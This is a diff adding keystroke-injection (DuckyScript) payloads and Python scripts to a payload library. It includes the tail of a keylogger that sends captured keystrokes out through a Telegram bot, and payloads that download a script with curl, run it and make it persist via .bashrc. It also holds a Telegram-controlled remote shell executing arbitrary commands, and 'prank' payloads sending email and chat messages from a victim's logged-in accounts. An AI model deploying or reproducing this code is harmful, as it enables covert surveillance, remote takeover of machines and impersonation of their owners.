+    def __init__(self, log):
+        super().__init__()
+        self.log = log
+    
+    def run(self):
+        while True:
+            sleep(5)
+            #print("Sender send log")
+            self.log.send_log()
+
+
+log = Log()
+
+keylogger = Keylogger(log)
+keylogger.start()
+
+sender = Sender(log)
+sender.start()
+
+bot.infinity_polling()

payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt

@@ -0,0 +1,25 @@
+REM ########################################################
+REM #                                                      #
+REM # Title        : Persistent Keylogger - Telegram Based #
+REM # Author       : Aleff                                 #
+REM # Version      : 1.0                                   #
+REM # Category     : Execution                             #
+REM # Target       : Linux                                 #
+REM #                                                      #
+REM ########################################################
+
+REM Requirements:
+REM     - Internet Connection
+
+REM Here you must put your own file link
+DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+STRINGLN_BLOCK
+	curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
+	python3 connection.py &
+	fi" >> .bashrc; exit
+END_STRINGLN

payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md

@@ -0,0 +1,41 @@
+# Persistent Reverse Shell - Telegram Based
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+**Category**: Execution
+
+## Dependencies
+
+* Internet Connection
+
+## Description
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
+
+The script accept the `/reverse` command using the format `/reverse <shell_command>` and split `/reverse` from `<shell_command>` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
+
+Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py

@@ -0,0 +1,43 @@
+from telebot import TeleBot, types
+import subprocess
+
+# Set here the Telegram bot token
+BOT_TOKEN = ""
+bot = TeleBot(BOT_TOKEN)
+
+commands = [
+    types.BotCommand("/reverse", "/reverse <shell_command>")
+]
+
+bot.set_my_commands(commands=commands)
+
+@bot.message_handler(commands=['reverse'])
+def reverse_shell(message):
+    command = extract_command(message.text)
+    if command != "":
+        print(f"Command received: {command}")
+        out = run_command(command)
+        if len(out) > 1000:
+            bot.reply_to(message, "Message too long...")
+            chunk_size = 1000
+            for i in range(0, len(out), chunk_size):
+                bot.send_message(message.chat.id, out[i:i+chunk_size])
+        else:
+            bot.reply_to(message, out)
+
+def extract_command(message):
+    command_prefix = "/reverse"
+    if message.startswith(command_prefix):
+        return message[len(command_prefix):].strip()
+    else:
+        return None
+
+def run_command(command):
+    try:
+        result = subprocess.check_output(command, shell=True, text=True)
+        return result.strip()
+    except subprocess.CalledProcessError as e:
+        return f"Some error: {e}"
+
+
+bot.infinity_polling()

payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt

@@ -0,0 +1,25 @@
+REM ############################################################
+REM #                                                          #
+REM # Title        : Persistent Reverse Shell - Telegram Based #
+REM # Author       : Aleff                                     #
+REM # Version      : 1.0                                       #
+REM # Category     : Execution                                 #
+REM # Target       : Linux                                     #
+REM #                                                          #
+REM ############################################################
+
+REM Requirements:
+REM     - Internet Connection
+
+REM Here you must put your own file link
+DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
+
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+
+STRINGLN_BLOCK
+	curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
+	python3 connection.py &
+	fi" >> .bashrc; exit
+END_STRINGLN

payloads/library/execution/SendEmailThroughThunderbird/README.md

@@ -0,0 +1,70 @@
+# Send Email Through Thunderbird
+
+This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
+
+**Category**: Execution
+
+## Description
+
+This payload can be used to prank friends by sending emails at top speed from their thunderbird clients.
+
+This payload opens a shell (or powershell if running on windows), starts the Thunderbird application, and via the CTRL N sequence starts the email sending functionality that is not protected by any security system. After that it writes the recipient's email, the subject of the email and the body of the message and sends.
+
+## Getting Started
+
+### Windows 11
+
+```DuckyScript
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 2000
+STRINGLN Start-Process "thunderbird.exe"
+DELAY 4000
+```
+
+### Ubuntu 23.04
+
+```DuckyScript
+DELAY 1000
+CTRL-ALT t
+DELAY 2000
+STRINGLN thunderbird
+DELAY 4000
+```
+
+### Dependencies
+
+* Internet Connection
+* Thunderbird installed and email configured
+* ExecutionPolicy Bypass (for Windows target)
+
+### Settings
+
+- Receiver email address
+- Email Subject
+- Email Message
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/SendEmailThroughThunderbird/payload.txt

@@ -0,0 +1,52 @@
+REM ########################################################
+REM #                                                      |
+REM # Title        : Send Email Through Thunderbird        |
+REM # Author       : Aleff                                 |
+REM # Version      : 1.0                                   |
+REM # Category     : Execution                             |
+REM # Target       : Windows 10/11 - Linux(debian tested)  |
+REM #                                                      |
+REM ########################################################
+
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Thunderbird installed and email configured
+REM     - ExecutionPolicy Bypass (for Windows target)
+
+REM This payload is tested on:
+REM     - Ubuntu 23.04
+REM     - Windows 11
+
+REM REQUIRED - Set receiver email address
+DEFINE EMAIL-ADDRESS example@change-it.org
+
+REM REQUIRED - Set email Subject
+DEFINE SUBJECT example
+
+REM REQUIRED - Set email message
+DEFINE MESSAGE example
+
+DEFAULT_DELAY 1000
+REM # PowerShell
+GUI r
+STRING powershell
+ENTER
+STRINGLN Start-Process "thunderbird.exe"
+DELAY 4000
+
+REM # Thunderbird
+CTRL n
+DELAY 2000
+STRING EMAIL-ADDRESS
+REPEAT 2 TAB
+STRING SUBJECT
+TAB
+STRING MESSAGE
+CTRL ENTER
+DELAY 2000
+ENTER
+
+REM # End actions
+ALT F4
+ALT F4

payloads/library/execution/SendMessagesInTeams/README.md

@@ -0,0 +1,46 @@
+# Send Messages In Teams
+
+A script used to prank your friends sending a message through the user Teams.
+
+**Category**: Prank
+
+## Description
+
+A script used to prank your friends sending a message through the user Teams.
+
+Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Microsoft Teams installed and user logged-in
+* ExecutionPolicy Bypass
+* Python
+
+### Settings
+
+- Setup the receiver
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/SendMessagesInTeams/payload.txt

@@ -0,0 +1,49 @@
+REM ###########################################
+REM #                                         |
+REM # Title        : Send Messages In Teams   |
+REM # Author       : Aleff                    |
+REM # Version      : 1.0                      |
+REM # Category     : Prank                    |
+REM # Target       : Windows 10-11            |
+REM #                                         |
+REM ###########################################
+
+REM Requirements:
+REM     - Microsoft Teams installed and user logged-in
+REM     - Internet Connection
+REM     - ExecutionPolicy Bypass
+REM     - Python
+
+REM 1. Open a powershell
+REM 2. Close if Teams is opens and reopen it
+REM 3. Goto search bar
+REM 4. Search the person by name, email, id or what you want...
+REM 5. Downarrow and enter to open the chat
+
+REM REQUIRED - Name, email, id or what you want for contact the target
+DEFINE #USER example
+
+REM REQUIRED - Messages
+DEFINE #MESSAGE example
+
+DEFAULT_DELAY 1000
+GUI r
+STRINGLN powershell
+
+REM #### Powershell ####
+STRINGLN Stop-Process -Name "Teams"
+STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)"
+
+REM It depends by the computer power
+DELAY 10000
+
+REM #### Teams ####
+CTRL N
+STRINGLN #USER
+REPEAT 2 TAB
+
+REM #### Messages ####
+STRINGLN MESSAGE
+
+ALT F4
+ALT F4

payloads/library/execution/SendSignalMessages/payload.txt

@@ -0,0 +1,40 @@
+REM #########################################
+REM #                                       |
+REM # Title        : Send Signal Messages   |
+REM # Author       : Aleff                  |
+REM # Version      : 1.0                    |
+REM # Category     : Prank, Execution       |
+REM # Target       : Windows 10-11          |
+REM #                                       |
+REM #########################################
+
+REM Requirements:
+REM   - Internet Connection
+REM   - Signal App installed
+REM Payload Plug-And-Play but can be edited as you want the message
+
+REM REQUIRED - Receiver number
+DEFINE #NUMBER 3332211000
+
+REM REQUIRED - Message to send
+DEFINE #MESSAGE YOUR_MESSAGE
+
+DEFAULT_DELAY 500
+
+GUI r
+STRINGLN powershell
+STRINGLN Stop-Process -Name "Signal"
+STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
+DELAY 5000
+REPEAT 3 TAB
+ENTER
+STRING #NUMBER
+TAB
+ENTER
+
+REM This is the message that will be sent.
+REM You can change it as you want, if you want.
+STRINGLN #MESSAGE
+
+REM Closing Signal App
+ALT F4

payloads/library/execution/SendTelegramMessages_Linux/README.md

@@ -0,0 +1,45 @@
+# Send Telegram Messages - Linux ✅
+
+A script used to prank your friends sending messages by using Telegram app.
+
+**Category**: Prank
+
+## Description
+
+A script used to prank your friends sending messages by using Telegram app.
+
+Opens a shell, runs the telegram-desktop app, search the user by the id, enter into the chat, write the message(s) and send, then close the app and the shell.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* telegram-desktop installed and activated
+
+### Settings
+
+- Telegram username
+- Messages
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/SendTelegramMessages_Linux/payload.txt

@@ -0,0 +1,36 @@
+REM #########################################
+REM #                                       |
+REM # Title        : Send Telegram Messages |
+REM # Author       : Aleff                  |
+REM # Version      : 1.0                    |
+REM # Category     : Prank                  |
+REM # Target       : Linux                  |
+REM #                                       |
+REM #########################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - telegram-desktop installed and activated
+
+DEFINE #USERNAME @example
+DEFINE #MESSAGE example
+
+DEFAULT_DELAY 500
+CTRL ALT t
+DELAY 2000
+
+STRINGLN telegram-desktop
+REM It depends by the computer...
+DELAY 3000
+
+REM Define the message receiver username
+STRINGLN #USERNAME
+
+REM Define the message(s)
+STRINGLN #MESSAGE
+REM other messages here...
+
+REM Closing Telegram App and the Shell
+ALT F4
+CTRL c
+ALT F4

payloads/library/execution/Send_Messages_In_Discord_Channel-Server/README.md

@@ -0,0 +1,53 @@
+# Send Messages In Discord Channel-Server
+
+This script can be used to send messages in a specific channel of a Discord text server.
+
+**Category**: Execution
+
+## Description
+
+This script can be used to send messages in a specific channel of a Discord text server.
+
+Open the GUI interface and trough this one open the Discord app, then use the keyboard shortcut CTRL-k to open the server chat.
+
+**Note** that if you want to send a message within a chat that has a very common name such as #general then be aware that it is very likely that the chat of the server in which you want to send the message will not be selected but some other. If, on the other hand, you want to send it in a chat with a somewhat more specific name such as wifi-pineapple (Hak5's text channel) then almost certainly the channel in which you wish to send the message will be selected.
+
+![](assets/1.png)
+![](assets/2.png)
+
+## Dependencies
+
+* Discord Installed
+* Internet connection
+
+## Settings
+
+- If, for example, the server is Hak5 and the channel in which you want to send the message is called wifi-pineapple then you should write just wifi-pineapple
+
+    `[18] DEFINE #CHAT_NAME example`
+
+- This depends on the power of the computer and whether there are upgrades to be done
+
+    `[27] DELAY 6000`
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Send_Messages_In_Discord_Channel-Server/payload.txt

@@ -0,0 +1,41 @@
+REM ############################################################
+REM #                                                          |
+REM # Title        : Send Messages In Discord Channel-Server   |
+REM # Author       : Aleff                                     |
+REM # Version      : 1.0                                       |
+REM # Category     : Execution                                 |
+REM # Target       : Windows 10-11                             |
+REM #                                                          |
+REM ############################################################
+
+
+REM Requirements:
+REM     - Internet connection
+REM     - Discord Installed
+
+
+REM If, for example, the server is Hak5 and the channel in which you want to send the message is called wifi-pineapple then you should write just wifi-pineapple
+DEFINE CHAT_NAME example
+
+
+REM Open Discord app
+GUI
+DELAY 1000
+STRINGLN Discord
+
+REM This depends on the power of the computer and whether there are upgrades to be done
+DELAY 6000
+
+REM Search by Discord keyboard shortcut and open it
+CTRL k
+DELAY 500
+STRINGLN #CHAT_NAME
+DELAY 500
+
+STRINGLN_BLOCK
+    Write here..
+    your...
+    messages...
+END_STRINGLN
+
+ALT F4

payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit-Linux/README.md

@@ -0,0 +1,155 @@
+# Set An Arbitrary And Persistent Tor Circuit - Linux
+
+The "Set An Arbitrary And Persistent Tor Circuit" script is a payload designed to empower users to customize their Tor circuit according to their preferences using Duckyscript language. This payload provides the flexibility to set arbitrary Tor nodes and manually create a persistent circuit.
+
+It is essential to emphasize that the use of this script must comply with local laws and respect the privacy of others. The primary goal of "Set An Arbitrary And Persistent Tor Circuit" is to provide users with more direct control over their Tor connection, allowing them to customize and further enhance their online browsing experience.
+
+**Category**: Execution
+
+![1](https://i.ibb.co/t8sYGFs/1.gif)
+
+*Dynamic visualization of the script in action. In this case I modified only the MiddleNode so that the persistence of the modification is shown but the full use of the payload results in immodifiability and persistence of all 3 nodes.*
+
+_**Note**: The nodes are unmodifiable unless the initial Tor settings are restored or unless the torrc file is subsequently modified by removing the configurations made._
+
+## Index
+
+- [Set An Arbitrary And Persistent Tor Circuit](#set-an-arbitrary-and-static-tor-circuit)
+- [Payload Description](#payload-description)
+- [Note](#note)
+- [Tor Configuration](#tor-configuration)
+- - [Description of the Tor Circuit](#description-of-the-tor-circuit)
+- - [Torrc Configuration File](#torrc-configuration-file)
+- [Tor University Challenge by EFF](#tor-university-challenge-by-eff) *Off-topic* 
+- [Sources](#sources)
+- [Credits](#credits)
+
+## Payload Description
+
+**Requirements:**
+- Tor installed
+- Fingerprints of your relays
+
+**Notes:**
+- Payload tested using TorBrowser 13.0.8 based on Mozilla Firefox 115.6.0esr ENG
+- Payload tested on Debian 12_eng; Ubuntu 23.10_eng;
+
+To find fingerprints of various nodes you can go to https://metrics.torproject.org and set up a search based on what you are interested in such as country, node name, etc... For example if you try to search for '**Aleff**' it will send you to my [Tor Relay page](https://metrics.torproject.org/rs.html#details/B8C9DF8404FE175E37241774856907184A667ED2) (_Unless someone has created other Relays with the same name in the meantime_) where you can find the fingerprint information which is the data you are interested in.
+
+![](https://i.ibb.co/YN5515G/tor-node.png)
+
+The script begins by defining the fingerprints of the entry, middle, and exit nodes using the `DEFINE` commands. Additionally, it provides instructions for activating administrator permissions, with specific considerations for systems like Debian and Ubuntu.
+
+**Configuration on Linux:**
+- If the operating system is Linux, the user must provide the command to obtain root privileges (`#root_permission_command`) as `sudo su` instead of `su` and the associated password (`#sudo_pass`).
+
+The script aims to edit the Tor configuration process to ensure the specific use of entry, middle, and exit nodes. Users need to customize the node fingerprints and provide specific operating system information to ensure the correct operation of the script on the target platform.
+
+In any case, the script is designed to completely overwrite the old configuration of the torrc file, so be very careful how you use it since it could be an irreversible change and could cause a loss of data.
+
+## Note
+
+- Tor must be installed.
+- **#EntryNode**, **#MiddleNode**, **#ExitNode**: These variables must contain the fingerprint of the relays you want to use as nodes in your circuit.
+- **#root_permission_command**: Activation of administrator permissions may vary from system to system. For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'. In general this can vary and is information that could be crucial in case the target has tampered with this functionality.
+- **#sudo_pass**: Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.
+- **#const_var**: Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
+
+## Tor Configuration
+
+![Tor](https://upload.wikimedia.org/wikipedia/commons/thumb/1/15/Tor-logo-2011-flat.svg/459px-Tor-logo-2011-flat.svg.png)
+
+### Description of the Tor Circuit
+
+The Tor circuit is a fundamental component of the infrastructure that ensures anonymity and security in online communications. The Tor circuit consists of three types of nodes, each with a specific role: Entry Node, Middle Node, and Exit Node.
+
+![Tor Circuit](https://upload.wikimedia.org/wikipedia/commons/d/dc/Tor-onion-network.png)
+
+1. **Entry Node:**
+   - The Entry Node is the first node in the Tor circuit.
+   - When a user initiates a connection through Tor, the traffic is encrypted and sent to the Entry Node.
+   - The Entry Node is aware of the user's IP address but cannot see the final destination of the traffic.
+   - Its primary function is to pass it to the next node, so the Middle Node, without knowing the ultimate destination.
+
+2. **Middle Node:**
+   - The Middle Node is the second node in the Tor circuit.
+   - It receives encrypted traffic from the Entry Node and forwards it to the next node in the chain, which can be another Middle Node or the Exit Node.
+   - The Middle Node is not aware of the user's IP address or the final destination of the traffic.
+   - Its main function is to further enhance anonymity since it lacks information about the origin or destination of the traffic.
+
+3. **Exit Node:**
+   - The Exit Node is the last node in the Tor circuit.
+   - It receives encrypted traffic from the Middle Node and decrypts it before sending it to the final destination on the internet.
+   - The Exit Node is aware of the destination address but does not know the user's IP address and the Entry Node in the same circuit.
+   - Its primary function is to provide a point of exit for the traffic while maintaining the anonymity of the user.
+
+### Torrc Configuration File
+
+The `torrc` configuration file is a crucial component of the Tor, governing the behavior and settings of the Tor network on a particular system. This plaintext configuration file is typically named "torrc" and is utilized to customize various aspects of Tor's operation. Here's an overview of the key elements found in the `torrc` file:
+
+1. **Entry, Middle, and Exit Nodes Configuration:**
+   - Users can specify the fingerprints or identities of preferred Entry, Middle, and Exit nodes using directives like `EntryNodes`, `MiddleNodes`, and `ExitNodes`. This allows users to influence the selection of these nodes in their Tor circuit for enhanced control or security. *This functionality is used in this payload.*
+
+2. **General Tor Configuration:**
+   - The `torrc` file includes parameters for configuring the general behavior of Tor. This may involve settings such as the port on which Tor listens, bandwidth limits, logging preferences, and whether the system should act as a relay or only as a client.
+
+3. **Bridge Configuration:**
+   - For users in regions with restricted access to the Tor network, the `torrc` file allows the configuration of bridge relays. Bridge relays help users bypass censorship by providing an alternative entry point to the Tor network.
+
+4. **Hidden Service Configuration:**
+   - Users hosting Tor hidden services can configure their services through the `torrc` file. This includes defining the service's port, authentication methods, and other related parameters.
+
+5. **Logging and Debugging:**
+   - The file provides options for configuring logging levels and debugging information. Users can tailor the amount of detail Tor logs, facilitating troubleshooting and analysis.
+
+6. **Security Settings:**
+   - Various security-related options can be configured in the `torrc` file, such as restricting certain features or specifying the behavior of Tor in response to specific security events.
+
+7. **Network and Protocol Settings:**
+   - Users can fine-tune Tor's network and protocol settings in the `torrc` file, influencing aspects such as circuit creation, DNS resolution, and transport protocols.
+
+Customizing the `torrc` file allows users to tailor Tor's behavior to their specific needs and security requirements. However, users should exercise caution and adhere to Tor's best practices to ensure the continued effectiveness and anonymity of their Tor usage.
+
+> See the [sources](#sources) section for more on this topic.
+
+## Tor University Challenge by EFF
+
+*Off-Topic*
+
+![](https://www.eff.org/files/banner_library/banner-tor-monions.png)
+
+Tor is a valuable tool for browsing the web anonymously, but since it's powered by volunteers willing to share some bandwidth and a computer, it's always in need of additional help. Which is why EFF is announcing the Tor University Challenge, a project asking universities to start running Tor relays on campus. Today, we're launching with support from 12 universities. With your help, we can add more universities to strengthen the Tor network to improve one of the best free privacy tools available today.
+
+*Source: https://www.eff.org/deeplinks/2023/08/announcing-tor-university-challenge*
+
+> If you are interested in finding out more about Tor and EFF's initiative, you can learn more at the official page of [Tor University Challenge](https://toruniversity.eff.org/).
+
+## Sources
+
+2. Select the relays - https://metrics.torproject.org/rs.html
+3. torrc - https://support.torproject.org/glossary/torrc/
+4. Official torrc documentation and so on - https://2019.www.torproject.org/docs/tor-manual.html.en
+5. Tor University Challenge - https://toruniversity.eff.org/
+
+
+## Credits
+
+<h2 align="center"> Aleff</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit-Linux/payload.txt

@@ -0,0 +1,53 @@
+REM ################################################################
+REM #                                                              |
+REM # Title        : Set An Arbitrary And Persistent Tor Circuit   |
+REM # Author       : Aleff                                         |
+REM # Version      : 1.0                                           |
+REM # Category     : Execution                                     |
+REM # Target       : Linux                                         |
+REM #                                                              |
+REM ################################################################
+
+REM Requirements:
+REM - Tor installed
+REM - Fingerprints of your relays
+
+REM Note:
+REM - Payload tested using TorBrowser 13.0.8 based on Mozilla Firefoz 115.6.0esr ENG
+REM - Payload tested on Windows 11_eng; Debian 12_eng; Ubuntu 23.10_eng;
+
+REM Set the Fingerprints here
+DEFINE #EntryNode example
+DEFINE #MiddleNode example
+DEFINE #ExitNode example
+
+REM Activation of administrator permissions may vary from system to system.
+REM For example, for Debian it is necessary to use 'su' while for other systems such as Ubuntu it is necessary to use 'sudo su'.
+REM In general this can vary and is information that could be crucial in case the target has tampered with this functionality.
+DEFINE #root_permission_command sudo su
+
+REM Edit this field only if you plan to use this script on Linux operating systems as you need administrator permissions and therefore you need to know the password.
+DEFINE #sudo_pass example
+
+REM Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
+DEFINE #const_entry_node EntryNodes
+DEFINE #const_middle_node MiddleNodes
+DEFINE #const_exit_node ExitNodes
+
+DELAY 2000
+REM Opens a new terminal and login with administrator permissions.
+CTRL-ALT t
+STRINGLN #root_permission_command
+DELAY 500
+STRING #sudo_pass
+DELAY 1000
+REM Writes the new configuration into the torrc file deleting all the previous settings.
+STRINGLN_BLOCK
+    echo "#const_entry_node #EntryNode
+    #const_middle_node #MiddleNode
+    #const_exit_node #ExitNode" > /etc/tor/torrc
+END_STRINGLN
+REM Then exit from the super user and close the terminal
+DELAY 500
+STRINGLN exit
+ALT F4

payloads/library/execution/Set_An_Arbitrary_And_Persistent_Tor_Circuit-Windows/README.md

@@ -0,0 +1,154 @@
+# Set An Arbitrary And Persistent Tor Circuit
+
+The "Set An Arbitrary And Persistent Tor Circuit" script is a payload designed to empower users to customize their Tor circuit according to their preferences using DuckyScript language. This payload provides the flexibility to set arbitrary Tor nodes and manually create a persistent circuit.
+
+It is essential to emphasize that the use of this script must comply with local laws and respect the privacy of others. The primary goal of "Set An Arbitrary And Persistent Tor Circuit" is to provide users with more direct control over their Tor connection, allowing them to customize and further enhance their online browsing experience.
+
+**Category**: Execution
+
+![1](https://i.ibb.co/t8sYGFs/1.gif)
+
+*Dynamic visualization of the script in action. In this case I modified only the MiddleNode so that the persistence of the modification is shown but the full use of the payload results in immodifiability and persistence of all 3 nodes.*
+
+_**Note**: The nodes are unmodifiable unless the initial Tor settings are restored or unless the torrc file is subsequently modified by removing the configurations made._
+
+## Index
+
+- [Set An Arbitrary And Persistent Tor Circuit](#set-an-arbitrary-and-static-tor-circuit)
+- [Payload Description](#payload-description)
+- [Note](#note)
+- [Tor Configuration](#tor-configuration)
+- - [Description of the Tor Circuit](#description-of-the-tor-circuit)
+- - [Torrc Configuration File](#torrc-configuration-file)
+- [Tor University Challenge by EFF](#tor-university-challenge-by-eff) *Off-topic* 
+- [Sources](#sources)
+- [Credits](#credits)
+
+## Payload Description
+
+**Requirements:**
+- Tor installed
+- Fingerprints of your relays
+
+**Notes:**
+- Payload tested using TorBrowser 13.0.8 based on Mozilla Firefox 115.6.0esr ENG
+- Payload tested on Windows 11_eng;
+
+To find fingerprints of various nodes you can go to https://metrics.torproject.org and set up a search based on what you are interested in such as country, node name, etc... For example if you try to search for '**Aleff**' it will send you to my [Tor Relay page](https://metrics.torproject.org/rs.html#details/B8C9DF8404FE175E37241774856907184A667ED2) (_Unless someone has created other Relays with the same name in the meantime_) where you can find the fingerprint information which is the data you are interested in.
+
+![](https://i.ibb.co/YN5515G/tor-node.png)
+
+The script begins by defining the fingerprints of the entry, middle, and exit nodes using the `DEFINE` commands. Additionally, it provides instructions for activating administrator permissions, with specific considerations for systems like Debian and Ubuntu.
+
+**Configuration on Windows:**
+- If the operating system is Windows, the script opens TorBrowser using Windows GUI commands.
+- Is not needed the root privileges
+- It overwrites all the old data with the new data defined at the beginning of the script.
+
+The script aims to edit the Tor configuration process to ensure the specific use of entry, middle, and exit nodes. Users need to customize the node fingerprints and provide specific operating system information to ensure the correct operation of the script on the target platform.
+
+In any case, the script is designed to completely overwrite the old configuration of the torrc file, so be very careful how you use it since it could be an irreversible change and could cause a loss of data.
+
+## Note
+
+- Tor must be installed.
+- **#EntryNode**, **#MiddleNode**, **#ExitNode**: These variables must contain the fingerprint of the relays you want to use as nodes in your circuit.
+- **#const_var**: Do not change the variables that begin with 'const', they are constants that allow the nodes to be configured correctly.
+
+## Tor Configuration
+
+![Tor](https://upload.wikimedia.org/wikipedia/commons/thumb/1/15/Tor-logo-2011-flat.svg/459px-Tor-logo-2011-flat.svg.png)
+
+### Description of the Tor Circuit
+
+The Tor circuit is a fundamental component of the infrastructure that ensures anonymity and security in online communications. The Tor circuit consists of three types of nodes, each with a specific role: Entry Node, Middle Node, and Exit Node.
+
+![Tor Circuit](https://upload.wikimedia.org/wikipedia/commons/d/dc/Tor-onion-network.png)
+
+1. **Entry Node:**
+   - The Entry Node is the first node in the Tor circuit.
+   - When a user initiates a connection through Tor, the traffic is encrypted and sent to the Entry Node.
+   - The Entry Node is aware of the user's IP address but cannot see the final destination of the traffic.
+   - Its primary function is to pass it to the next node, so the Middle Node, without knowing the ultimate destination.
+
+2. **Middle Node:**
+   - The Middle Node is the second node in the Tor circuit.
+   - It receives encrypted traffic from the Entry Node and forwards it to the next node in the chain, which can be another Middle Node or the Exit Node.
+   - The Middle Node is not aware of the user's IP address or the final destination of the traffic.
+   - Its main function is to further enhance anonymity since it lacks information about the origin or destination of the traffic.
+
+3. **Exit Node:**
+   - The Exit Node is the last node in the Tor circuit.
+   - It receives encrypted traffic from the Middle Node and decrypts it before sending it to the final destination on the internet.
+   - The Exit Node is aware of the destination address but does not know the user's IP address or the entry nodes in the circuit.
+   - Its primary function is to provide a point of exit for the traffic while maintaining the anonymity of the user.
+
+### Torrc Configuration File
+
+The `torrc` configuration file is a crucial component of the Tor, governing the behavior and settings of the Tor network on a particular system. This plaintext configuration file is typically named "torrc" and is utilized to customize various aspects of Tor's operation. Here's an overview of the key elements found in the `torrc` file:
+
+1. **Entry, Middle, and Exit Nodes Configuration:**
+   - Users can specify the fingerprints or identities of preferred Entry, Middle, and Exit nodes using directives like `EntryNodes`, `MiddleNodes`, and `ExitNodes`. This allows users to influence the selection of these nodes in their Tor circuit for enhanced control or security. *This functionality is used in this payload.*
+
+2. **General Tor Configuration:**
+   - The `torrc` file includes parameters for configuring the general behavior of Tor. This may involve settings such as the port on which Tor listens, bandwidth limits, logging preferences, and whether the system should act as a relay or only as a client.
+
+3. **Bridge Configuration:**
